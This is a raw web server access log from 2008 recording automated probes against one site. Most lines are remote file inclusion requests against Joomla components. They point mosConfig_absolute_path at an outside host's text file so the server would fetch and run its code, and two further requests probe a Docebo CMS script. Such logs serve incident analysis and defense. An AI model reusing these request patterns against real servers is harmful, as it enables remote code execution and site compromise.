64.22.89.194 - - [07/Aug/2008:09:25:10 -0700] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:18 -0700] "GET /logs/access_080311.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:18 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:18 -0700] "GET /logs/access_080329.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
64.22.89.194 - - [07/Aug/2008:09:25:19 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madebymantila.yoll.net/id.txt?? HTTP/1.1" 200 18495 "-" "libwww-perl/5.812" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:25:20 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.90.20.2 - - [07/Aug/2008:09:25:25 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=uid=1165(web11)%20gid=1165(web11)%20groups=501(ftponly),1165(web11)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
